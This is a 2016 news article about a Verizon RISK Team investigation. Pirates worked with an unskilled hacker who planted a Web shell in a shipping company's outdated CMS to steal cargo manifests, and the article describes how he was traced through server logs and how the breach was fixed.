Sea pirates hire hacker to break into shipping company's CMS

Mar 2, 2016 22:05 GMT  ·  By

A curious case reported by Verizon's RISK Team shows that even those lowly sea pirates chasing after cargo ships with old Kalashnikovs in worn-out dingies are resorting to hacking to boost up their profits.

As described in Verizon's most recent Data Breach Digest, a collection of cyber-security case studies the company's RISK Team helped investigate and solve sometime in the past year, a reputable global shipping conglomerate started having peculiar problems with sea pirates.

The shipping company was telling Verizon that pirates were boarding their vessels at regular intervals, equipped with a barcode reader (and weapons, of course), searching specific crates, emptying all the high-value cargo, and making off with the loot within minutes of launching their attacks.

All of this made the shipping company think there was something strange and hired the RISK Team to track down the source of a possible leak, which they suspected to be either an undiscovered data breach or an insider activating from within the company's headquarters.

The sea pirates were working together with a hacker

The RISK Team quickly narrowed down the problem to the firm's outdated custom-built CMS, which featured an insecure upload script. As the Verizon team explained, a hacker, either part of the sea pirates group or hired by them, had uploaded a Web shell via this insecure form. In turn, this shell was uploaded inside a Web-accessible directory.

To make things worse, that particular folder also had "execute" permissions, meaning the hacker could send commands to the Web shell via URL parameters and have them executed without any further exploit chaining.

Using this access to the shipping firm's database, the hacker pulled down BoLs (bills of lading), future shipment schedules, and ship routes so the pirates could plan their attack and identify crates holding valuable content.

The hacker lacked talent, was easily discovered

Fortunately, the hacker wasn't that skilled. Verizon says that the attacker used a Web shell that didn't support SSL, meaning that all executed commands were recorded in the Web server's log.

The RISK Team was able to recreate a historic timeline of all the hacker's actions and identify exactly what he looked at and where he sent the files.

"These threat actors, while given points for creativity, were clearly not highly skilled," the RISK Team explains. "For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers."

Hacker "forgot" to use a proxy/VPN to hide his real IP address

"The threat actors tried, albeit in vain, to establish a reverse shell to directly interact with one of the compromised hosts. Try as they might, the threat actors were unable to move laterally," the security researchers noted, also mentioning that the pirates' hacker also tried and failed to escalate his access to other company servers.

The hackers failed, even after managing to gain access to various accounts and passwords. Additionally, as a sign of their lack of skills, the attacker also didn't use a proxy or VPN and exposed their home IP address.

With all this information in hand, Verizon helped the company block the hacker's IP, remove the Web shell, take down its server, reset passwords for all compromised accounts, and upgrade the CMS.